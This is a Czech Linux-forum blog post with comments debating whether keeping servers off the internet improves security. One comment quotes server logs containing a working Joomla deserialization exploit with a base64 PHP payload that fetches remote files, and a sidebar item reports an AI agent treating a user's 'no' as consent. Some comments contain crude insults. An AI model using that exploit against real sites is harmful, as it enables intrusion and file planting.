abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
Přihlášení | Registrace
×
napište » Zprávičky
inzerujte » Pracovní nabídky
    SuperTux 0.7.0
    dnes 04:22 | Nová verze

    SuperTux (Wikipedie), tj. klasická 2D plošinovka inspirovaná sérií Super Mario, byl vydán v nové verzi 0.7.0. Videoukázka na YouTube. Hrát lze i ve webovém prohlížeči.

    Ladislav Hagara | Komentářů: 5
    Ageless Linux, odpor vůči ověřování věku
    dnes 03:11 | Zajímavý projekt

    Ageless Linux je linuxová distribuce vytvořená jako politický protest proti kalifornskému zákonu o věkovém ověřování uživatelů na úrovni OS (AB 1043). Kromě běžného instalačního obrazu je k dispozici i konverzní skript, který kompatibilní systém označí za Ageless Linux a levné jednodeskové počítače v ceně 12$ s předinstalovaným Ageless Linuxem, které se chystají autoři projektu dávat dětem. Ageless Linux je registrován jako operační

    … více »
    NUKE GAZA! 🎆 | Komentářů: 0
    PimpMyGRC, alternativní vzhled pro GRC
    včera 15:33 | Humor

    PimpMyGRC upravuje vzhled toolkitu GNU Radio a přidává alternativní barevná témata. Primárním cílem autora bylo pouze vytvořit tmavé prostředí vhodné pro noční práci, nicméně k dispozici je nakonec celá škála barevných schémat včetně možností různých animací a vizuálních efektů (plameny, matrix, bubliny...), které nepochybně posunou uživatelský zážitek na zcela jinou úroveň. Témata jsou skripty v jazyce Python, které nahrazují

    … více »
    NUKE GAZA! 🎆 | Komentářů: 2
    GIMP 3.2
    včera 14:33 | Nová verze

    GIMP 3.2 byl oficiálně vydán (Mastodon, 𝕏). Přehled novinek v poznámkách k vydání.

    Ladislav Hagara | Komentářů: 0
    FRANK OS, operační systém pro RP2350
    včera 12:33 | Zajímavý projekt

    FRANK OS je open-source operační systém pro mikrokontrolér RP2350 (s FRANK M2 board) postavený na FreeRTOS, který přetváří tento levný čip na plně funkční počítač s desktopovým uživatelským rozhraním ve stylu Windows 95 se správcem oken, terminálem, prohlížečem souborů a knihovnou aplikací, ovládaný PS/2 myší a klávesnicí, s DVI video výstupem. Otázkou zůstává, zda by 520 KB SRAM stačilo každému 😅.

    NUKE GAZA! 🎆 | Komentářů: 4
    Vláda USA získá za zprostředkování dohody o TikToku 10 miliard dolarů
    14.3. 22:55 | IT novinky

    Administrativa amerického prezidenta Donalda Trumpa by měla dostat zhruba deset miliard dolarů (asi 214 miliard Kč) za zprostředkování dohody o převzetí kontroly nad aktivitami sociální sítě TikTok ve Spojených státech.

    Ladislav Hagara | Komentářů: 2
    Debian 13.4
    14.3. 21:33 | Nová verze

    Projekt Debian aktualizoval obrazy stabilní větve „Trixie“ (13.4). Shrnuje opravy za poslední dva měsíce, 111 aktualizovaných balíčků a 67 bezpečnostních hlášení. Opravy se týkají mj. chyb v glibc nebo webovém serveru Apache.

    |🇵🇸 | Komentářů: 2
    Ne znamená ano
    14.3. 13:00 | Humor

    Agent umělé inteligence Claude Opus ignoroval uživatelovu odpověď 'ne' na dotaz, zda má implementovat změny kódu, a přesto se pokusil změny provést. Agent si odpověď 'ne' vysvětlil následovně: Uživatel na mou otázku 'Mám to implementovat?' odpověděl 'ne' - ale když se podívám na kontext, myslím, že tím 'ne' odpovídá na to, abych žádal o svolení, tedy myslí 'prostě to udělej, přestaň se ptát'.

    NUKE GAZA! 🎆 | Komentářů: 13
    Instagram končí s koncovým šifrováním
    14.3. 00:44 | IT novinky

    Po 8. květnu 2026 už na Instagramu nebudou podporované zprávy opatřené koncovým šifrováním. V chatech, kterých se bude změna týkat, se objeví pokyny o tom, jak si média nebo zprávy z nich stáhnout, pokud si je chcete ponechat.

    Ladislav Hagara | Komentářů: 8
    Digg opět skončil
    14.3. 00:33 | IT novinky

    V lednu byla ve veřejné betě obnovena sociální síť Digg (Wikipedie). Dnes bylo oznámeno její ukončení (Hard Reset). Společnost Digg propouští velkou část týmu a přiznává, že se nepodařilo najít správné místo na trhu. Důvody jsou masivní problém s boty a silná konkurence. Společnost Digg nekončí, malý tým pokračuje v práci na zcela novém přístupu. Cílem je vybudovat platformu, kde lze důvěřovat obsahu i lidem za ním. Od dubna se do Diggu na plný úvazek vrací Kevin Rose, zakladatel Diggu z roku 2004.

    Ladislav Hagara | Komentářů: 5
    Centrum | Napsat | Starší
    navrhněte » Anketa
    Které desktopové prostředí na Linuxu používáte?
     (16%)
     (7%)
     (0%)
     (11%)
     (29%)
     (2%)
     (5%)
     (1%)
     (13%)
     (24%)
    Celkem 1092 hlasů
     Komentářů: 26, poslední 12.3. 08:56
    Rozcestník
    AbcLinuxu
    HDmag.cz
    majales - Majales
    Aktuální zápisy
    ?Přístup k archivovaným zápisům za jednotlivé měsíce. Archív

    ?Přístup na osobní hlavní stranu a na hlavní stranu všech blogů. Navigace
    Nej blogů na AbcLinuxu
    Nejčtenější za poslední měsíc Nejkomentovanější za poslední měsíc
    AbcLinuxu:/ Blogy / Majales / Obecné / Projekt bez přístupu k internetu - přínos pro bezpečnost
    Štítky: bez, bezpečnost, konexe, management, práce, projekt, sudo, VPN, zákaz

    Projekt bez přístupu k internetu - přínos pro bezpečnost

    15.6.2016 21:25 | Obecné | poslední úprava: 15.6.2016 21:24

    Ahoj, Rád bych zde rozpoutal diskuzi, ohledně skutečného přínosu k bezpečnosti linuxových serverů, pokud nemají přímý nebo dokonce ani nepřímý (proxy s autorizací) přístup k internetu.

    Dle mého skromného úsudku je přínos takového opatření k bezpečnosti diskutabilní, a naopak přináší spoustu práce a úskalí administrátorům těchto strojů. K serverům je přístup přes VPN, která odřezává internetové konexe, zůstávají pouze konexe ke strojů v lokální síti. K serverům se přistupuje pouze přes klíče s heslem, sudo je pak chráněno heslem. Servery jsou v různých VLANech, společná je pouze management a monitoring VLANa. Tak se tedy ptám jaký další přínos pro celkovou bezpečnost může mít zákaz routování do internetu?        

    Hodnocení: 100 %

            špatnédobré        

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Komentáře

    Nástroje: Začni sledovat (1) ?Zašle upozornění na váš email při vložení nového komentáře. , Tisk

    Vložit další komentář

    15.6.2016 22:02 hypvofxy | skóre: 5 | blog: hypvofxy | Brno
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    Ochrana pred malwarem. Vyrazne se snizuje riziko leaknuti dat, nebo zneuziti backdooru.
    16.6.2016 09:16 majales | skóre: 30 | blog: Majales
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    Servery jsou bez grafického rozhraní, přístup pouze přes ssh do textové konzole. Malware je doménou prohlížečů. S tím backdoorem to možná pravda je, ale pokud je přístup pouze přes chráněnou proxy s antivir a antimalware štítem tak by mělo být riziko minimální, pokud se nepletu.
    Bystroushaak avatar 16.6.2016 11:55 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    Malware je doménou prohlížečů.
    Ani nepočítám, kolikrát jsem někoho viděl řešit vypwnovaný server, protože se tam malware vlámal přes nějakou PHP mrdku, kterou programovala nějaká poloretardovaná opice (naposledy můj bratr cca půl roku zpět musel odepsat celý server a udělat kvůli tomu reinstall). Minimálně dvakrát jsem psal software, který tyhle chyby uměl hledat. Schválně se někdy podívej do logů, kolik tam je těhle útoků. Například ke mě na server je jich o dost víc, než regulérních přístupů. Doslova můžu říct, že klepou co pár minut.

    Typický scan, viz třeba: 
    181.143.27.106 - - [15/Jun/2016:01:33:41 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 40 "-" "-"
181.143.27.106 - - [15/Jun/2016:01:34:59 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 404 33 "-" "-"
181.143.27.106 - - [15/Jun/2016:01:36:17 +0200] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 37 "-" "-"
    To ani nepočítám hovna jako: 
    192.187.109.42 - - [14/Jun/2016:07:03:44 +0200] "GET / HTTP/1.1" 200 35641 "-" "}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDataba
seDriverMysql":0:{}s:8:"feed_url";s:3738:"eval(base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbWVkaWEveHh4eC5waHAiIDsNCiRmcD1mb3BlbigiJGNoZWNrIiwidysiKTsNCmZ3cml0ZSgkZnAsYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbVoxYm1OMGFXOXVJR2gwZEhCZloyVjBLQ
1IxY213cGV3MEtDU1JwYlNBOUlHTjFjbXhmYVc1cGRDZ2tkWEpzS1RzTkNnbGpkWEpzWDNObGRHOXdkQ2drYVcwc0lFTlZVa3hQVUZSZlVrVlVWVkpPVkZKQlRsTkdSVklzSURFcE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOURUMDVPUlVOVVZFbE5SVTlWVkN3Z01UQXBPdzBLQ1dOMWNteGZjMlYwYjNCMEtDUnBi
U3dnUTFWU1RFOVFWRjlHVDB4TVQxZE1UME5CVkVsUFRpd2dNU2s3RFFvSlkzVnliRjl6WlhSdmNIUW9KR2x0TENCRFZWSk1UMUJVWDBoRlFVUkZVaXdnTUNrN0RRb0pjbVYwZFhKdUlHTjFjbXhmWlhobFl5Z2thVzBwT3cwS0NXTjFjbXhmWTJ4dmMyVW9KR2x0S1RzTkNuME5DaVJqYUdWamF5QTlJQ1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9
WRjlTVDA5VUoxMGdMaUFpTDIxbFpHbGhMMk56Y3k1d2FIQWlJRHNOQ2lSMFpYaDBJRDBnYUhSMGNGOW5aWFFvSjJoMGRIQTZMeTl0Y25SbkxuVnBMbkJvYVc1dFlTNWxaSFV1Y0dndlkyOXRjRzl1Wlc1MGN5OXFiMjl0YkdFdWRIaDBKeWs3RFFva2IzQmxiaUE5SUdadmNHVnVLQ1JqYUdWamF5d2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQm
xiaXdnSkhSbGVIUXBPdzBLWm1Oc2IzTmxLQ1J2Y0dWdUtUc05DbWxtS0dacGJHVmZaWGhwYzNSektDUmphR1ZqYXlrcGV3MEtJQ0FnSUdWamFHOGdKR05vWldOckxpSThMMkp5UGlJN0RRcDlaV3h6WlNBTkNpQWdaV05vYnlBaWJtOTBJR1Y0YVhSeklqc05DbVZqYUc4Z0ltUnZibVVnTGx4dUlDSWdPdzBLSkdOb1pXTnJNaUE5SUNSZlUwV
lNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwyMWxaR2xoTDJwdFlXbHNMbkJvY0NJZ093MEtKSFJsZUhReUlEMGdhSFIwY0Y5blpYUW9KMmgwZEhBNkx5OXRjblJuTG5WcExuQm9hVzV0WVM1bFpIVXVjR2d2WTI5dGNHOXVaVzUwY3k5cWJXRnBiSG91ZEhoMEp5azdEUW9rYjNCbGJqSWdQU0JtYjNCbGJpZ2tZMmhsWTJzeUxD
QW5keWNwT3cwS1puZHlhWFJsS0NSdmNHVnVNaXdnSkhSbGVIUXlLVHNOQ21aamJHOXpaU2drYjNCbGJqSXBPdzBLYVdZb1ptbHNaVjlsZUdsemRITW9KR05vWldOck1pa3BldzBLSUNBZ0lHVmphRzhnSkdOb1pXTnJNaTRpUEM5aWNqNGlPdzBLZldWc2MyVWdEUW9nSUdWamFHOGdJbTV2ZENCbGVHbDBjeklpT3cwS1pXTm9ieUFpWkc5dVp
USWdMbHh1SUNJZ093MEtEUW9rWTJobFkyc3pQU1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDBndWFIUnRJaUE3RFFva2RHVjRkRE1nUFNCb2RIUndYMmRsZENnbkp5azdEUW9rYjNBelBXWnZjR1Z1S0NSamFHVmphek1zSUNkM0p5azdEUXBtZDNKcGRHVW9KRzl3TXl3a2RHVjRkRE1wT3cwS1ptTnNiM05sS0NSdm
NETXBPdzBLRFFva1kyaGxZMnMwUFNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwyMWxaR2xoTDJOb1pXTnJMbkJvY0NJZ093MEtKSFJsZUhRMElEMGdhSFIwY0Y5blpYUW9KMmgwZEhBNkx5OXRjblJuTG5WcExuQm9hVzV0WVM1bFpIVXVjR2d2WTI5dGNHOXVaVzUwY3k5eGNTNTBlSFFuS1RzTkNpUnZjRFE5Wm05d
1pXNG9KR05vWldOck5Dd2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQTBMQ1IwWlhoME5DazdEUXBtWTJ4dmMyVW9KRzl3TkNrN0RRb05DaVJqYUdWamF6VTlKRjlUUlZKV1JWSmJKMFJQUTFWTlJVNVVYMUpQVDFRblhTQXVJQ0l2TDIxbFpHbGhMMnB0WVdsc2N5NXdhSEFpSURzTkNpUjBaWGgwTlNBOUlHaDBkSEJmWjJWMEtDZG9kSFJ3T2k4
dmJYSjBaeTUxYVM1d2FHbHViV0V1WldSMUxuQm9MMk52YlhCdmJtVnVkSE12Y1hGNkxuUjRkQ2NwT3cwS0pHOXdOVDFtYjNCbGJpZ2tZMmhsWTJzMUxDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNEVXNKSFJsZUhRMUtUc05DbVpqYkc5elpTZ2tiM0ExS1RzTkNnMEtKR05vWldOck5qMGtYMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZVazlQVkN
kZElDNGdJaTlzYVdKeVlYSnBaWE12YW05dmJXeGhMM05sYzNOcGIyNHZjMlZ6YzJsdmJpNXdhSEFpSURzTkNpUjBaWGgwTmlBOUlHaDBkSEJmWjJWMEtDZG9kSFJ3T2k4dmNHRnpkR1ZpYVc0dVkyOXRMM0poZHk5VlNFRkhWRGc0TnljcE93MEtKRzl3TmoxbWIzQmxiaWdrWTJobFkyczJMQ0FuZHljcE93MEtabmR5YVhSbEtDUnZjRFlzSk
hSbGVIUTJLVHNOQ21aamJHOXpaU2drYjNBMktUc05DZzBLSkhSdmVpQTlJQ0lpT3cwS0pITjFZbXBsWTNRZ1BTQW5TbTl0SUhwNmVpQW5JQzRnSkY5VFJWSldSVkpiSjFORlVsWkZVbDlPUVUxRkoxMDdEUW9rYUdWaFpHVnlJRDBnSjJaeWIyMDZJRXRsYTJ0aGFTQlRaVzV6Wlc0Z1BIWnZibEpsYVc1b1pYSjZTMnhoZFhOQVUyRnBhMjkxY
m1GSWFXSnBMbU52YlQ0bklDNGdJbHh5WEc0aU93MEtKRzFsYzNOaFoyVWdQU0FpVTJobGJHeDZJRG9nYUhSMGNEb3ZMeUlnTGlBa1gxTkZVbFpGVWxzblUwVlNWa1ZTWDA1QlRVVW5YU0F1SUNJdmJHbGljbUZ5YVdWekwycHZiMjFzWVM5cWJXRnBiQzV3YUhBL2RTSWdMaUFpWEhKY2JpSWdMaUJ3YUhCZmRXNWhiV1VvS1NBdUlDSmNjbHh1
SWpzTkNpUnpaVzUwYldGcGJDQTlJRUJ0WVdsc0tDUjBiM29zS
UNSemRXSnFaV04wTENBa2JXVnpjMkZuWlN3Z0pHaGxZV1JsY2lrN0RRb05Da0IxYm14cGJtc29YMTlHU1V4RlgxOHBPdzBLRFFvTkNqOCsnKSk7DQpmY2xvc2UoJGZwKTs='));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}<F0><FD><FD><FD>"
192.187.109.42 - - [14/Jun/2016:07:03:45 +0200] "GET / HTTP/1.1" 200 35641 "-" "}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:3738:"eval(base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbWVkaWEveHh4eC5waHAiIDsNCiRmcD1mb3BlbigiJGNoZWNrIiwidysiKTsNCmZ3cml0ZSgkZnAsYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbVoxYm1OMGFXOXVJR2gwZEhCZloyVjBLQ1IxY213cGV3MEtDU1JwYlNBOUlHTjFjbXhmYVc1cGRDZ2tkWEpzS1RzTkNnbGpkWEpzWDNObGRHOXdkQ2drYVcwc0lFTlZVa3hQVUZSZlVrVlVWVkpPVkZKQlRsTkdSVklzSURFcE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOURUMDVPUlVOVVZFbE5SVTlWVkN3Z01UQXBPdzBLQ1dOMWNteGZjMlYwYjNCMEtDUnBiU3dnUTFWU1RFOVFWRjlHVDB4TVQxZE1UME5CVkVsUFRpd2dNU2s3RFFvSlkzVnliRjl6WlhSdmNIUW9KR2x0TENCRFZWSk1UMUJVWDBoRlFVUkZVaXdnTUNrN0RRb0pjbVYwZFhKdUlHTjFjbXhmWlhobFl5Z2thVzBwT3cwS0NXTjFjbXhmWTJ4dmMyVW9KR2x0S1RzTkNuME5DaVJqYUdWamF5QTlJQ1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDIxbFpHbGhMMk56Y3k1d2FIQWlJRHNOQ2lSMFpYaDBJRDBnYUhSMGNGOW5aWFFvSjJoMGRIQTZMeTl0Y25SbkxuVnBMbkJvYVc1dFlTNWxaSFV1Y0dndlkyOXRjRzl1Wlc1MGN5OXFiMjl0YkdFdWRIaDBKeWs3RFFva2IzQmxiaUE5SUdadmNHVnVLQ1JqYUdWamF5d2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQmxiaXdnSkhSbGVIUXBPdzBLWm1Oc2IzTmxLQ1J2Y0dWdUtUc05DbWxtS0dacGJHVmZaWGhwYzNSektDUmphR1ZqYXlrcGV3MEtJQ0FnSUdWamFHOGdKR05vWldOckxpSThMMkp5UGlJN0RRcDlaV3h6WlNBTkNpQWdaV05vYnlBaWJtOTBJR1Y0YVhSeklqc05DbVZqYUc4Z0ltUnZibVVnTGx4dUlDSWdPdzBLSkdOb1pXTnJNaUE5SUNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwyMWxaR2xoTDJwdFlXbHNMbkJvY0NJZ093MEtKSFJsZUhReUlEMGdhSFIwY0Y5blpYUW9KMmgwZEhBNkx5OXRjblJuTG5WcExuQm9hVzV0WVM1bFpIVXVjR2d2WTI5dGNHOXVaVzUwY3k5cWJXRnBiSG91ZEhoMEp5azdEUW9rYjNCbGJqSWdQU0JtYjNCbGJpZ2tZMmhsWTJzeUxDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNHVnVNaXdnSkhSbGVIUXlLVHNOQ21aamJHOXpaU2drYjNCbGJqSXBPdzBLYVdZb1ptbHNaVjlsZUdsemRITW9KR05vWldOck1pa3BldzBLSUNBZ0lHVmphRzhnSkdOb1pXTnJNaTRpUEM5aWNqNGlPdzBLZldWc2MyVWdEUW9nSUdWamFHOGdJbTV2ZENCbGVHbDBjeklpT3cwS1pXTm9ieUFpWkc5dVpUSWdMbHh1SUNJZ093MEtEUW9rWTJobFkyc3pQU1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDBndWFIUnRJaUE3RFFva2RHVjRkRE1nUFNCb2RIUndYMmRsZENnbkp5azdEUW9rYjNBelBXWnZjR1Z1S0NSamFHVmphek1zSUNkM0p5azdEUXBtZDNKcGRHVW9KRzl3TXl3a2RHVjRkRE1wT3cwS1ptTnNiM05sS0NSdmNETXBPdzBLRFFva1kyaGxZMnMwUFNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwyMWxaR2xoTDJOb1pXTnJMbkJvY0NJZ093MEtKSFJsZUhRMElEMGdhSFIwY0Y5blpYUW9KMmgwZEhBNkx5OXRjblJuTG5WcExuQm9hVzV0WVM1bFpIVXVjR2d2WTI5dGNHOXVaVzUwY3k5eGNTNTBlSFFuS1RzTkNpUnZjRFE5Wm05d1pXNG9KR05vWldOck5Dd2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQTBMQ1IwWlhoME5DazdEUXBtWTJ4dmMyVW9KRzl3TkNrN0RRb05DaVJqYUdWamF6VTlKRjlUUlZKV1JWSmJKMFJQUTFWTlJVNVVYMUpQVDFRblhTQXVJQ0l2TDIxbFpHbGhMMnB0WVdsc2N5NXdhSEFpSURzTkNpUjBaWGgwTlNBOUlHaDBkSEJmWjJWMEtDZG9kSFJ3T2k4dmJYSjBaeTUxYVM1d2FHbHViV0V1WldSMUxuQm9MMk52YlhCdmJtVnVkSE12Y1hGNkxuUjRkQ2NwT3cwS0pHOXdOVDFtYjNCbGJpZ2tZMmhsWTJzMUxDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNEVXNKSFJsZUhRMUtUc05DbVpqYkc5elpTZ2tiM0ExS1RzTkNnMEtKR05vWldOck5qMGtYMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZVazlQVkNkZElDNGdJaTlzYVdKeVlYSnBaWE12YW05dmJXeGhMM05sYzNOcGIyNHZjMlZ6YzJsdmJpNXdhSEFpSURzTkNpUjBaWGgwTmlBOUlHaDBkSEJmWjJWMEtDZG9kSFJ3T2k4dmNHRnpkR1ZpYVc0dVkyOXRMM0poZHk5VlNFRkhWRGc0TnljcE93MEtKRzl3TmoxbWIzQmxiaWdrWTJobFkyczJMQ0FuZHljcE93MEtabmR5YVhSbEtDUnZjRFlzSkhSbGVIUTJLVHNOQ21aamJHOXpaU2drYjNBMktUc05DZzBLSkhSdmVpQTlJQ0lpT3cwS0pITjFZbXBsWTNRZ1BTQW5TbTl0SUhwNmVpQW5JQzRnSkY5VFJWSldSVkpiSjFORlVsWkZVbDlPUVUxRkoxMDdEUW9rYUdWaFpHVnlJRDBnSjJaeWIyMDZJRXRsYTJ0aGFTQlRaVzV6Wlc0Z1BIWnZibEpsYVc1b1pYSjZTMnhoZFhOQVUyRnBhMjkxYm1GSWFXSnBMbU52YlQ0bklDNGdJbHh5WEc0aU93MEtKRzFsYzNOaFoyVWdQU0FpVTJobGJHeDZJRG9nYUhSMGNEb3ZMeUlnTGlBa1gxTkZVbFpGVWxzblUwVlNWa1ZTWDA1QlRVVW5YU0F1SUNJdmJHbGljbUZ5YVdWekwycHZiMjFzWVM5cWJXRnBiQzV3YUhBL2RTSWdMaUFpWEhKY2JpSWdMaUJ3YUhCZmRXNWhiV1VvS1NBdUlDSmNjbHh1SWpzTkNpUnpaVzUwYldGcGJDQTlJRUJ0WVdsc0tDUjBiM29zSUNSemRXSnFaV04wTENBa2JXVnpjMkZuWlN3Z0pHaGxZV1JsY2lrN0RRb05Da0IxYm14cGJtc29YMTlHU1V4RlgxOHBPdzBLRFFvTkNqOCsnKSk7DQpmY2xvc2UoJGZwKTs='));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}<F0><FD><FD><FD>"
192.187.109.42 - - [14/Jun/2016:07:03:45 +0200] "GET /media/xxxx.php HTTP/1.1" 404 26 "-" "python-requests/2.9.1"
192.187.109.42 - - [14/Jun/2016:07:03:45 +0200] "GET /media/css.php HTTP/1.1" 404 25 "-" "python-requests/2.9.1"
    Ono obecně, někdy doporučuji si nahodit na virtuál honeypot a pak si číst logy. Člověk by asi nevěřil, kolik útoků běžně chodí na ničím nevýznamný server.
    blog.rfox.eu | DREAMLAND
    Bystroushaak avatar 16.6.2016 11:57 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    Jinak co se týče SSH, tak to jede jeden útok za druhým jak je den dlouhý, přestože nemám SSH na 22.
    blog.rfox.eu | DREAMLAND
    16.6.2016 12:37 majales | skóre: 30 | blog: Majales
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    To je sice fajn, ale jak jsem psal - aby bylo možné dostat se na servery přes ssh je nutné se připojit přes vpn. Script kiddies na php nebo web taky znám, ale zase od toho je tam oddělení přes vlany, mod-security atd. Případně se dají ještě poladit nějaká fail2ban pravidla.
    Heron avatar 16.6.2016 12:43 Heron | skóre: 53 | blog: root_at_heron | Olomouc
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    A?
    Heron
    Bystroushaak avatar 16.6.2016 13:03 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    Malware rozhodně není doménou prohlížečů.
    blog.rfox.eu | DREAMLAND
    Heron avatar 16.6.2016 13:08 Heron | skóre: 53 | blog: root_at_heron | Olomouc
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    No a jak to souvisí s ssh? Že někdo zkouší slovníková hesla tě nemůže rozhodit.

    Také je dobré se zamyslet, co získá, když se tam nějak dostane. A pokud něco získá (a vadí to), tak se podle toho zařídit.
    Heron
    Heron avatar 16.6.2016 12:44 Heron | skóre: 53 | blog: root_at_heron | Olomouc
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    A ty 404 něčemu vadí?
    Heron
    16.6.2016 18:36 hypvofxy | skóre: 5 | blog: hypvofxy | Brno
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    Servery jsou bez grafického rozhraní, přístup pouze přes ssh do textové konzole.
    Riziko zranitelnosti existuje vzdy.
    Malware je doménou prohlížečů.
    To je naprosty nesmysl.
    S tím backdoorem to možná pravda je, ale pokud je přístup pouze přes chráněnou proxy s antivir a antimalware štítem tak by mělo být riziko minimální, pokud se nepletu.
    Pred ctenim prikazu nekde ze vzdaleneho HTTP serveru a naslednym vyleakovanim cennych dat te asi antivir ani antimalware stit moc neuchrani.

    Jinak sis ale odpovedel sam - i kdyby to riziko bylo minimalni, porad existuje.
    regine avatar 15.6.2016 22:08 regine | skóre: 22 | blog: regine
    Rozbalit Rozbalit vše comment

    Znám několik celoplošných systémů českých bezpečnostních ministerstev (jeden systém asi 3 tisíce denně aktivních uživatelů), které jedou na linux systémech (například SLES) a k internetu 100 procentně nesmí být konektováni. Čistá LAN.

    Žádný problém s provozem systémů nemají. Na jednom utajovaném jsem pracoval s HP-UX (unix) s šifrovaný dedikovanými linkami do zahraničí.

    Cigareta krátí život o 1 minutu, láhev koňaku o 5 minut a pracovní den krátí život o 8 hodin.
    regine2 avatar 15.6.2016 22:26 regine2 | skóre: 14
    Rozbalit Rozbalit vše router comment

    V poslední době právě routování se považuje za velkou bezpečnostní díru. Poslední medializovaný zářez je Ubiquity.

    Většinou když už je nutno (e-commerce), staví se servery až za dva firewally. Nic levného

    csirt.cz ubiquiti
    Dokud nepřiletí mimozemšťané, všechno už jaksi bylo.
    16.6.2016 10:03 melkors | skóre: 13 | blog: kdo_chce_kam
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    To je jako ptat se, proc by mela byt pokladna zavrena, kdyz jsou stejne penize v trezoru :-P

    A konkretni duvod (co mne hned napadl): Kdyz dojde k lokalnimu expoitu, data neni mozno snadno dostat mimo LAN.
    Heron avatar 16.6.2016 11:24 Heron | skóre: 53 | blog: root_at_heron | Olomouc
    Rozbalit Rozbalit vše Re: Projekt bez přístupu k internetu - přínos pro bezpečnost
    Dle mého skromného úsudku je přínos takového opatření k bezpečnosti diskutabilní, a naopak přináší spoustu práce a úskalí administrátorům těchto strojů.
    Je to přesně tak. Pracoval jsem na mnoha projektech, které byly "zabezpečeny" dle nějakého auditu (což je asi tak to nejhorší, co může nastat), to znamená za devatero VPN, oddělené sítě, přístupové karty apod. Pracovat se na tom nedalo.

    Pochopitelně, aby se na tom pracovat dalo (protože třeba ministr si na tiskovce vzpomněl, že slíbil nějaký systém), tak si ti admini vytvořili tunel přímo do těch systémů. No a dodavatelé tento tunel potom dostali taky. Takže oficiálně se dělala šaškárna s VPN kartami apod, ale reálně se jelo v podstatě přímo. Jinak by totiž ta zakázka nešla realizovat vůbec.

    Problém je, že jak jde čas, tak se vymění admini a na tento tunel se zapomeneme. Případně se o něj nikdo nestará, takže to zůstane v konfiguraci z roku 2007 - RSA 1024, MD5 apod. Takže další bezpečnostní hrozba. (Mimochodem, tohle je sranda. Řeší se heartbleedy apod., nahrazují se klíče, vyhazují se staré šifry - což je dobře - ale jen z webserverů, na všechno ostatní se zapomíná - třeba na ty VPNky).

